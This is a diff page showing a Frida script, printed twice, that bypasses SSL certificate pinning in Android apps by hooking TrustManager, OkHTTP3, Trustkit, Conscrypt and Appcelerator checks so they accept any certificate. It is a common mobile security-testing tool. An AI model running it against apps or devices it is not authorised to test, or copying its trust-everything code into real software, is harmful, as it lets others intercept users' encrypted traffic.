numanturle · January 10, 2021 00:46
diff --git a/frida_multiple_unpinning.js b/frida_multiple_unpinning.js
 /*  Android ssl certificate pinning bypass for various methods
    by Maurizio Siddu
    
    Run with:
    frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
 */

 setTimeout(function() {
    Java.perform(function () {
        console.log('')
        console.log('======')
        console.log('[#] Android Bypass for various Certificate Pinning methods [#]')
        console.log('======')
    
        var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
        var SSLContext = Java.use('javax.net.ssl.SSLContext');
    
    
        // TrustManager (Android < 7)
        var TrustManager = Java.registerClass({
            // Implement a custom TrustManager
            name: 'com.sensepost.test.TrustManager',
            implements: [X509TrustManager],
            methods: {
                checkClientTrusted: function (chain, authType) {},
                checkServerTrusted: function (chain, authType) {},
                getAcceptedIssuers: function () {return []; }
            }
        });
    
        // Prepare the TrustManager array to pass to SSLContext.init()
        var TrustManagers = [TrustManager.$new()];
        // Get a handle on the init() on the SSLContext class
        var SSLContext_init = SSLContext.init.overload(
            '[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom');
        try {
            // Override the init method, specifying the custom TrustManager
            SSLContext_init.implementation = function(keyManager, trustManager, secureRandom) {
                console.log('[+] Intercepted Trustmanager (Android < 7) request');
                SSLContext_init.call(this, keyManager, TrustManagers, secureRandom);
            };
    
            console.log('[+] Setup custom TrustManager (Android < 7)');
        } catch (err) {
            console.log("[-] TrustManager (Android < 7) pinner not found");
        }
    
    
    
        // okhttp3
        try {
            var CertificatePinner = Java.use('okhttp3.CertificatePinner');
            CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function (str) {
                console.log('[+] Intercepted OkHTTP3: ' + str);
                return;
            };
    
            console.log('[+] Setup OkHTTP3 pinning')
        } catch(err) {
            // If we dont have a ClassNotFoundException exception, raise the issue encountered
            if (err.message.indexOf('ClassNotFoundException') === 0) {
                throw new Error(err);
            }
            console.log('[-] OkHTTP3 pinner not found')
        }
    
    
    
        // Trustkit
        try {
            var Activity = Java.use("com.datatheorem.android.trustkit.pinning.OkHostnameVerifier");
            Activity.verify.overload('java.lang.String', 'javax.net.ssl.SSLSession').implementation = function (str) {
                console.log('[+] Intercepted Trustkit{1}: ' + str);
                return true;
            };
            Activity.verify.overload('java.lang.String', 'java.security.cert.X509Certificate').implementation = function (str) {
                console.log('[+] Intercepted Trustkit{2}: ' + str);
                return true;
            };
    
            console.log('[+] Setup Trustkit pinning')
        } catch(err) {
            console.log('[-] Trustkit pinner not found')
        }
    
    
    
        // TrustManagerImpl  (Android > 7)
        try {
            var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
            TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
                console.log('[+] Intercepted TrustManagerImpl (Android > 7): ' + host);
                return untrustedChain;
            }
    
            console.log('[+] Setup TrustManagerImpl (Android > 7) pinning')
        } catch (err) {
            console.log('[-] TrustManagerImpl (Android > 7) pinner not found')
        }
    
    
    
    
        // Appcelerator
        try {
            var PinningTrustManager = Java.use('appcelerator.https.PinningTrustManager');
            PinningTrustManager.checkServerTrusted.implementation = function () {
                console.log('[+] Intercepted Appcelerator');
            }

            console.log('[+] Setup Appcelerator pinning')
        } catch (err) {
            console.log('[-] Appcelerator pinner not found')
        }



        // OpenSSLSocketImpl
        try {
            var OpenSSLSocketImpl = Java.use('com.android.org.conscrypt.OpenSSLSocketImpl');
            OpenSSLSocketImpl.verifyCertificateChain.implementation = function (certRefs, authMethod) {
                console.log('[+] Intercepted OpenSSLSocketImpl');
            }

            console.log('[+] Setup OpenSSLSocketImpl pinning')
        } catch (err) {
            console.log('[-] OpenSSLSocketImpl pinner not found');
        }

 });
 }, 0);
	/* Android ssl certificate pinning bypass for various methods
	by Maurizio Siddu

	Run with:
	frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
	*/

	setTimeout(function() {
	Java.perform(function () {
	console.log('')
	console.log('======')
	console.log('[#] Android Bypass for various Certificate Pinning methods [#]')
	console.log('======')

	var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
	var SSLContext = Java.use('javax.net.ssl.SSLContext');


	// TrustManager (Android < 7)
	var TrustManager = Java.registerClass({
	// Implement a custom TrustManager
	name: 'com.sensepost.test.TrustManager',
	implements: [X509TrustManager],
	methods: {
	checkClientTrusted: function (chain, authType) {},
	checkServerTrusted: function (chain, authType) {},
	getAcceptedIssuers: function () {return []; }
	}
	});

	// Prepare the TrustManager array to pass to SSLContext.init()
	var TrustManagers = [TrustManager.$new()];
	// Get a handle on the init() on the SSLContext class
	var SSLContext_init = SSLContext.init.overload(
	'[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom');
	try {
	// Override the init method, specifying the custom TrustManager
	SSLContext_init.implementation = function(keyManager, trustManager, secureRandom) {
	console.log('[+] Intercepted Trustmanager (Android < 7) request');
	SSLContext_init.call(this, keyManager, TrustManagers, secureRandom);
	};

	console.log('[+] Setup custom TrustManager (Android < 7)');
	} catch (err) {
	console.log("[-] TrustManager (Android < 7) pinner not found");
	}



	// okhttp3
	try {
	var CertificatePinner = Java.use('okhttp3.CertificatePinner');
	CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function (str) {
	console.log('[+] Intercepted OkHTTP3: ' + str);
	return;
	};

	console.log('[+] Setup OkHTTP3 pinning')
	} catch(err) {
	// If we dont have a ClassNotFoundException exception, raise the issue encountered
	if (err.message.indexOf('ClassNotFoundException') === 0) {
	throw new Error(err);
	}
	console.log('[-] OkHTTP3 pinner not found')
	}



	// Trustkit
	try {
	var Activity = Java.use("com.datatheorem.android.trustkit.pinning.OkHostnameVerifier");
	Activity.verify.overload('java.lang.String', 'javax.net.ssl.SSLSession').implementation = function (str) {
	console.log('[+] Intercepted Trustkit{1}: ' + str);
	return true;
	};
	Activity.verify.overload('java.lang.String', 'java.security.cert.X509Certificate').implementation = function (str) {
	console.log('[+] Intercepted Trustkit{2}: ' + str);
	return true;
	};

	console.log('[+] Setup Trustkit pinning')
	} catch(err) {
	console.log('[-] Trustkit pinner not found')
	}



	// TrustManagerImpl (Android > 7)
	try {
	var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
	TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
	console.log('[+] Intercepted TrustManagerImpl (Android > 7): ' + host);
	return untrustedChain;
	}

	console.log('[+] Setup TrustManagerImpl (Android > 7) pinning')
	} catch (err) {
	console.log('[-] TrustManagerImpl (Android > 7) pinner not found')
	}




	// Appcelerator
	try {
	var PinningTrustManager = Java.use('appcelerator.https.PinningTrustManager');
	PinningTrustManager.checkServerTrusted.implementation = function () {
	console.log('[+] Intercepted Appcelerator');
	}

	console.log('[+] Setup Appcelerator pinning')
	} catch (err) {
	console.log('[-] Appcelerator pinner not found')
	}



	// OpenSSLSocketImpl
	try {
	var OpenSSLSocketImpl = Java.use('com.android.org.conscrypt.OpenSSLSocketImpl');
	OpenSSLSocketImpl.verifyCertificateChain.implementation = function (certRefs, authMethod) {
	console.log('[+] Intercepted OpenSSLSocketImpl');
	}

	console.log('[+] Setup OpenSSLSocketImpl pinning')
	} catch (err) {
	console.log('[-] OpenSSLSocketImpl pinner not found');
	}

	});
	}, 0);
No results found